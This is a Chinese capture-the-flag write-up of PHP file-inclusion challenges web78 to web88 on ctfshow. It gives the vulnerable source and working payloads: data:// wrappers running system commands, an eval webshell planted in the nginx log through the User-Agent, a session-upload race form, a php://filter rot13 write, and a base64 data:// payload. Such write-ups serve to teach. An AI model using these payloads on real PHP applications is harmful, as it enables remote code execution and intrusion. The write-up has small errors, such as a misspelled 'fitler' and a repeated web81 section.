ctfshow 文件包含(web78-88)更新中

web78

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

最基础的文件包含，无过滤

使用日志包含或用伪协议读取

伪协议:

data

?file=data://text/plain,<?php system("ls");?>
?file=data://text/plain,<?php system("tac f*");?>

日志包含

读取日志

?file=/var/log/nginx/access.log

在ua里传入木马

<?php eval($_POST[1]);?>

再用post传递

1=system(tac f*);

得到flag

ctfshow{0e6d01fd-77ac-45e1-98c2-159ceb1c856e}

web79

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

相比于web78，将php换成了???，但不影响，flag.php可以用f*代替，可以用代替，日志包含也不会影响

得到flag

ctfshow{de034f27-e4ec-4763-9638-35f0885a7f99}

web80

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

相比于之前，data和php都被???替换，伪协议data不用再用了，我们可以使用日志包含做题

，得到flag

ctfshow{d2af6629-fa72-42ec-b6fb-df73f7ec0e8e}

web81

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了:，但日志包含依旧可用

得到flag

ctfshow{fb772a9d-2522-407a-a0ed-dfae80740ad4}

web81

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

与上题相似，同样可用文件包含做

web82-86

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

小数点被过滤，日志包含不可用，这时需要用到session竞争

<!DOCTYPE html>
<html>
<body>
<form action="https://bec36ebc-5fc6-4c1b-8e6d-d4ae0a98374c.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
 
<?php
session_start();
?>

首先用html脚本传入一个cookie:PHPSESSID=flag的文件，文件随便

用burpsuite传入并拦截，更改cookie后发到intruder，我们使用爆破攻击

无payload，资源池设置设置发送请求数，无限生成，就让他一直跑

接下来，在/tmp目录下就会生成sess_flag的临时文件，内容就是我们传入的

访问?file=/temp/sess_flag,依然用burpsuite拦截，发到intruder，资源池中发送请求数要大于前面的，两个一起跑，就能读取到内容

后续也通过修改html脚本中内容，实现rce，读取flag

web87

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:57:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

这题用的是 file_put_contents(),写入函数，将file先进行url解码，接着和

$content一起写入

我们肯定想到伪协议写入php文件，但这里file中开头会有一句，导致后面的content的语句无法运行，所以我们需要想办法，既然不能绕过，就得把这句话曲解掉

刚开始想的是用base64解码，后来发现前面的部分会连着后面，导致变成整体变成一坨

后面看到了string.rot13,这是一种偏移，偏移两次正好不变，所以将我们的RCE语句进行一次rot13偏移，这样再偏移一次，就变回了正常的rce语句

payload:

GET:XXX/?file=php://fitler/write=string.rot13/resource=1.php

进行两次url编码，要是两次

GET:XXX/?file=php://fitler/write=string.rot13/resource=1.php%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%37%34%25%36%63%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

这时候post传入偏移后的rce语句

POST:content=<?cuc flfgrz('yf')?>

之后查看url/1.php即可

web88

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-17 02:27:25
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

 */
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了一部分内容，但并没有过滤data

使用data伪协议，将后面的rce语句进行一次base64编码，但编码不能出现=和+，只需要再语句后面补几个字母即可

payload:

GET: url/?file=data://text/plain;base64,PD89c3lzdGVtKCd0YWMgZmwqJyk/PmFh